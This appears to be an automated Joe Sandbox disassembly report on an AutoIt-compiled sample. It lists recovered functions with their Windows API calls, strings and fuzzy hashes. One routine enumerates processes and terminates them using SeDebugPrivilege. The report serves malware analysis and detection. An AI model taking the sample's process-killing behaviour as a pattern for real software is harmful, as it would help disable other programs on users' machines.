GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00571449,?,?,00000000), ref: 00571843
GetCurrentProcess.KERNEL32(00571449,00000000,?,00571449,?,?,00000000), ref: 0057184B
DuplicateHandle.KERNEL32(00000000,?,00571449,?,?,00000000), ref: 0057184E
CreateThread.KERNEL32(00000000,00000000,00571874,00000000,00000000,00000000), ref: 00571868

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 09e8468a245220e03fdfcd945d78faa8b3f697f1e8659289c2849273603031c6
Instruction ID: 46fec11f13f0ccf2d9f6bbdd5053c8cba2646cac1bf36057acf69a3238f3dc8e
Opcode Fuzzy Hash: 09e8468a245220e03fdfcd945d78faa8b3f697f1e8659289c2849273603031c6
Instruction Fuzzy Hash: 5701BBB5340308BFE710ABA5DC4DF6B3FACEB9AB11F008411FA05DB1A1DA709804DB20

Function 0059A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0057D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0057D501
Part of subcall function 0057D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0057D50F
Part of subcall function 0057D4DC: CloseHandle.KERNEL32(00000000), ref: 0057D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0059A16D
GetLastError.KERNEL32 ref: 0059A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0059A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0059A268
GetLastError.KERNEL32(00000000), ref: 0059A273
CloseHandle.KERNEL32(00000000), ref: 0059A2C4

Strings

SeDebugPrivilege, xrefs: 0059A18F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: ac8467f77acd6d20e48965530fabdb13270f78c6b943394862487d9f12b233cc
Instruction ID: e0704fa6ca13c87619b056634e1cb1450a27cccd01a9f3c3f23e821b2de89b9e
Opcode Fuzzy Hash: ac8467f77acd6d20e48965530fabdb13270f78c6b943394862487d9f12b233cc
Instruction Fuzzy Hash: 5D615E342042429FEB10DF18C498F55BFA1BF94318F14849CE4664B7A2C776ED45CBD2

Function 005A3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 005A3925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 005A393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 005A3954
_wcslen.LIBCMT ref: 005A3999
SendMessageW.USER32(?,00001057,00000000,?), ref: 005A39C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 005A39F4

Strings

SysListView32, xrefs: 005A38F7

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: f01334a2a6e1618b05379d73bd6a9e98ff72a4ae3d3d6b655d43d670c74be508
Instruction ID: a1f9f8aba6b8e4cb58b309b81d8268a2f0420fcd9578ca1bfad196a03ca267d3
Opcode Fuzzy Hash: f01334a2a6e1618b05379d73bd6a9e98ff72a4ae3d3d6b655d43d670c74be508
Instruction Fuzzy Hash: A641D071A00219ABEB21DF64CC49BEE7FA9FF49354F100526F948E7281D7B49E84CB90

Function 0057BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0057BCFD
IsMenu.USER32(00000000), ref: 0057BD1D
CreatePopupMenu.USER32 ref: 0057BD53
GetMenuItemCount.USER32(01585818), ref: 0057BDA4
InsertMenuItemW.USER32(01585818,?,00000001,00000030), ref: 0057BDCC

Strings

0, xrefs: 0057BCA8
2, xrefs: 0057BD37

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 494da3f4b1aa77ae215433e21e77289b6ffb16378bea6289337b786cb5ad49f7
Instruction ID: 2c2c97a1fb7455183e1d6cc62613661665a13b37a265714c6c8adc8c2d7d318f
Opcode Fuzzy Hash: 494da3f4b1aa77ae215433e21e77289b6ffb16378bea6289337b786cb5ad49f7
Instruction Fuzzy Hash: 72519F70A002059FEB21CFA8E888BAEBFF4BF55314F14C519E419D7291E7719944EB51

Function 00532D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00532D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00532D53
_ValidateLocalCookies.LIBCMT ref: 00532DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00532E0C
_ValidateLocalCookies.LIBCMT ref: 00532E61

Strings

csm, xrefs: 00532DF6
&HS, xrefs: 00532DFE, 00532E07, 00532E18

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &HS$csm
API String ID: 1170836740-2847240634
Opcode ID: 60946cf2c6352f6042e4c9637a5862af839fd061c5a36f7a07a9601b591cae74
Instruction ID: 0bea1da9764ef4f34922b89c5fa33763107bcb5945878550b89b573c13aae0ce
Opcode Fuzzy Hash: 60946cf2c6352f6042e4c9637a5862af839fd061c5a36f7a07a9601b591cae74
Instruction Fuzzy Hash: C841A434A01609EBCF10DF68C849A9EBFB5BF84324F148555E915AB392D731EE06CBD0

Function 0057C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0057C913

Strings

blank, xrefs: 0057C895
stop, xrefs: 0057C8E4
question, xrefs: 0057C8CC
warning, xrefs: 0057C8FC
info, xrefs: 0057C8B4

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: ea2bc0b084ce332786ab556cd7c5520075d54c1e45639393e8a50dd1be2c80e2
Instruction ID: e212c30a210cf7aa27542c3ff9acd9c788ff0629e0f630f1785aae49e8fb743c
Opcode Fuzzy Hash: ea2bc0b084ce332786ab556cd7c5520075d54c1e45639393e8a50dd1be2c80e2
Instruction Fuzzy Hash: EE11EB3168930BBBA7119B54AC82CEA7F9CFF15754B10442FF608A6282D7707D417665

Function 0057ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0057ED2A
_wcslen.LIBCMT ref: 0057ED3B
_wcslen.LIBCMT ref: 0057ED79
_wcslen.LIBCMT ref: 0057EDAF
_wcslen.LIBCMT ref: 0057EDDF
_wcslen.LIBCMT ref: 0057EDEF
_wcslen.LIBCMT ref: 0057EE2B
_wcslen.LIBCMT ref: 0057EE5A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 91c284f149294394141a96bf077773e97512e10061c01fc198e0c790f3d07584
Instruction ID: fd9260e992b1fcecdb2533b2e0b1c8fb117d3ad969f22688c65896332eea0067
Opcode Fuzzy Hash: 91c284f149294394141a96bf077773e97512e10061c01fc198e0c790f3d07584
Instruction Fuzzy Hash: 80418466C1021975CB11EBB4988EACF7BBCBF89710F508466F518E3122FB34E255C7A5

Function 0052F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 0052F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 0056F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 0056F454

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 555f59884f08ed50073d300ce7ac90860e5ff693b2ecf81badc99e52699361ac
Instruction ID: 07321a2e70d98a1bac38aea76dd3c6b95a3245066138fbfcc962061d945a9381
Opcode Fuzzy Hash: 555f59884f08ed50073d300ce7ac90860e5ff693b2ecf81badc99e52699361ac
Instruction Fuzzy Hash: FB410B31608690BAC7398B2DF88872A7FB1BF97314F14483CE087576E1D631A8C4DB11

Function 005A2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 005A2D1B
GetDC.USER32(00000000), ref: 005A2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 005A2D2E
ReleaseDC.USER32(00000000,00000000), ref: 005A2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 005A2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 005A2D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,005A5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 005A2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 005A2DE1

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 826aeedad7eb1065195f62f79de3374bf1494445f255d6e05f40f3e10ce37e8e
Instruction ID: b6d39b8348042ce4923334a8c5d0a1ebf2a7551c46a4fdac2a551361e7c2b3a7
Opcode Fuzzy Hash: 826aeedad7eb1065195f62f79de3374bf1494445f255d6e05f40f3e10ce37e8e
Instruction Fuzzy Hash: 92316972201214BBEB218F548C8AFEB3FA9FB1A715F044055FE089A292C6759C55CBA4

Function 00575622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00575637
_memcmp.LIBVCRUNTIME ref: 00575659
_memcmp.LIBVCRUNTIME ref: 00575671
_memcmp.LIBVCRUNTIME ref: 00575684
_memcmp.LIBVCRUNTIME ref: 0057569E
_memcmp.LIBVCRUNTIME ref: 005756B1
_memcmp.LIBVCRUNTIME ref: 005756C9
_memcmp.LIBVCRUNTIME ref: 005756E4

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 70b45551231ea2c49f2181fb741abaf3fd90eb8826f5753e55158a43b827ec74
Instruction ID: ce476ce3a50280507b72a00b44a597f3a5bb3df3f37a3004d0808bb695d88dfd
Opcode Fuzzy Hash: 70b45551231ea2c49f2181fb741abaf3fd90eb8826f5753e55158a43b827ec74
Instruction Fuzzy Hash: 82212961644E0A77D2185521AD96FFE3F5CFF61394F448420FD0E9A581FBA0EE1092E9

Function 00594FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0059502E, 00595383
Not an Object type, xrefs: 00595007

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 5a56291e7cb7dc02fb1611ac729ea5b451d6355270a925ecd4a4f7b9ac67e684
Instruction ID: 4994603213440e1249d98e5c545af81e94d688fc66b64a5b5c8d9e703bc23fe2
Opcode Fuzzy Hash: 5a56291e7cb7dc02fb1611ac729ea5b451d6355270a925ecd4a4f7b9ac67e684
Instruction Fuzzy Hash: A9D1E271A0060AAFDF11CFA8C885FAEBBB5FF48344F148469E915AB281E770DD55CB90

Function 00551522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,005517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 005515CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00551651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,005517FB,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 005516E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 005516FB

Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00551777
__freea.LIBCMT ref: 005517A2
__freea.LIBCMT ref: 005517AE

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: e8304211e53872cf78084dfc1e33bd3c4004e3408b64d64a4d2f45e1bf780cc9
Instruction ID: c04c13829556676bdde93f596624673d63ad07e03a4ba3af2b3dd2827bf6d391
Opcode Fuzzy Hash: e8304211e53872cf78084dfc1e33bd3c4004e3408b64d64a4d2f45e1bf780cc9
Instruction Fuzzy Hash: 9D91C671E10A165ADB208E78C8A5BEE7FB5FF49315F18055AEC02E7141EB35DC48CB68

Function 00594523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00594648
VariantInit.OLEAUT32(?), ref: 00594749
VariantClear.OLEAUT32(?), ref: 00594753
VariantClear.OLEAUT32(?), ref: 005947B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 005945D8, 00594706, 005947BE
Incorrect Object type in FOR..IN loop, xrefs: 0059472C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 394316b21b43a62c5a4bf4c2d46862402d16557e59365ab99ad4b497214932e2
Instruction ID: 41213f7b4867b2642b7d579067c4a1d108a3a7272f84ede0c31922d5a4a1301b
Opcode Fuzzy Hash: 394316b21b43a62c5a4bf4c2d46862402d16557e59365ab99ad4b497214932e2
Instruction Fuzzy Hash: B5917E71A00219ABDF24CFA4D848FAEBFB8FF46715F108559E505AB280D7709D46CFA0

Function 00581187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0058125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00581284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 005812A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 005812D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0058135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 005813C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00581430

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 148ef1dbce5227e56b34e09841ee106e26920361c44d50065e1b0d91fa047f87
Instruction ID: de43210863cf6dd09675dc264b1f14575ccda69dbb8db402c8801cd81d3bf2c4
Opcode Fuzzy Hash: 148ef1dbce5227e56b34e09841ee106e26920361c44d50065e1b0d91fa047f87
Instruction Fuzzy Hash: 7F91E175A006199FDB00EF94C889BBEBFB9FF85311F104429E901FB291D774A946CB98

Function 0052948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 83f3c22fb306f6be88ca3d7481be7fa10cefbf19928e3787af2bff1dfcc73a85
Instruction ID: 3cb3b983fbfa0f9e69b899443e4a6e3a1e498c1d3afaa14e7ea96eee4cdfe8c9
Opcode Fuzzy Hash: 83f3c22fb306f6be88ca3d7481be7fa10cefbf19928e3787af2bff1dfcc73a85
Instruction Fuzzy Hash: 46910671E00219AFCB14CFA9D888AEEBFB8FF4A320F144555E515B7291D774A941CBA0

Function 00593947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0059396B
CharUpperBuffW.USER32(?,?), ref: 00593A7A
_wcslen.LIBCMT ref: 00593A8A
VariantClear.OLEAUT32(?), ref: 00593C1F

Part of subcall function 00580CDF: VariantInit.OLEAUT32(00000000), ref: 00580D1F
Part of subcall function 00580CDF: VariantCopy.OLEAUT32(?,?), ref: 00580D28
Part of subcall function 00580CDF: VariantClear.OLEAUT32(?), ref: 00580D34

Strings

AUTOIT.ERROR, xrefs: 00593A80, 00593A85
Incorrect Parameter format, xrefs: 005939A6, 00593BA1

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: d1de0cec47eb83c8b73fed0c5b2871f7964d3ad9d0ec9e0fbbb42569a274da58
Instruction ID: dc642ee4a540e05f302883e646ca5ec0a6347dd7f755bcea8d9dc74af3d1ce25
Opcode Fuzzy Hash: d1de0cec47eb83c8b73fed0c5b2871f7964d3ad9d0ec9e0fbbb42569a274da58
Instruction Fuzzy Hash: 769136756083069FCB10EF28C49596ABBE5FF89314F14882DF88997351DB30EE45CB92

Function 00594BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0057000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?,?,0057035E), ref: 0057002B
Part of subcall function 0057000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570046
Part of subcall function 0057000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570054
